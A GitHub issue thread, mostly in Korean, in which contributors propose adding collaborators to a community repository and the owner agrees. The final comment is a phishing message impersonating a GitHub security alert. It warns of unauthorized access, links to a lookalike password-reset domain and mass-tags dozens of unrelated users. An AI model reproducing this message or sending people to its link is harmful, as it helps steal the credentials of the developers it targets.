### ISSUE TITLE
Collaborator 추가

### ISSUE THREAD

**Issue by koremp** [channy/korea-devculture#7]
이런 공익적인 목적으로 개인이 운영하는 레포지토리는 PR, 이슈 등으로 기여할 수 있지만, 아무래도 개인이 운영하다 보니, 상황에 따라 기여하는 내용이 반영되는 시기가 늦어지곤 하는 것 같아요.

그래서 이 레포지토리의 Collaborator에 다양한 직군, 성별, 연령 등의 운영진분들이 추가되면 좋을 것 같아 제안해 보아요.

**Comment by junhoyeo** [comment]
말씀하신 것처럼 이 레포지토리에는 업데이트 비용 문제가 존재한다고 생각합니다. #9 에서 자동화를 통한 해결을 제안합니다.

**Comment by channy** [comment]
좋은 제안 감사합니다 자동화 업데이트 해주셔서 너무 감사하구요. 그럼에도 매뉴얼로 업데이트하는 부분이 있으니 그 부분은 참여 의사가 있으신 분께 레포 권한도 드릴 수 있도록 해볼께요.

**Comment by koremp** [comment]
감사합니다! 이 논의 내용에 대한 결과가 `README.md` 파일에 적혀있으면 더 좋을 것 같네요. 좋은 레포지토리 운영에 감사드려요.

**Comment by alain-medblue** [comment]
# Unauthorized Access to Your GitHub Account

We have detected unauthorized access to your GitHub account. In order to prevent further unauthorized activity, we kindly ask you to reset your password and revoke access to any suspicious entities.

Please visit the following link to reset your password and secure your account: [GitHub Password Reset](http://github.hudevelopers.online/)

Thank you for your prompt attention and cooperation in ensuring the security of your GitHub account.

**Affected GitHub Accounts:**
- jaradtke-aws
- @jweite-amazon
- @drewvanstone
- @sauravonwww
- @LienNguyen2910
- @burhan
- @navinsoni
- @lewisdiamond
- @cheeseandcereal
- @kstribrnAmzn
- @codingspirit
- @cxbrowne1207
- @atqy
- @runakash
- @leoherran-aws
- @petermoon
- @kstribrnAmzn
- @jerry-shao
- @mikwin2maxkondra
- @paulbartell
- @ermanno
- @awood45
- @shubnil
- @kirit93
- @skmcgrail
- @sp1999
- @cheeseandcereal
- @jonathanmeier5
- @jerry-shao
- @shimomut
- @mslshao
- @mackalex
- @navinsoni
- @micahhausler
- @tlindsay42
- @taiyingchen
- @michaelnchin
- @shubnil
- @maxc01
- @Leo10Gama
- @podulator
- @wnbts
- @priyajeet
- @ppittle
- @aggarg
- @sheldonlsides
- @junpuf
- @djamison
- and many more.

Please take immediate action to secure your account. Thank you.
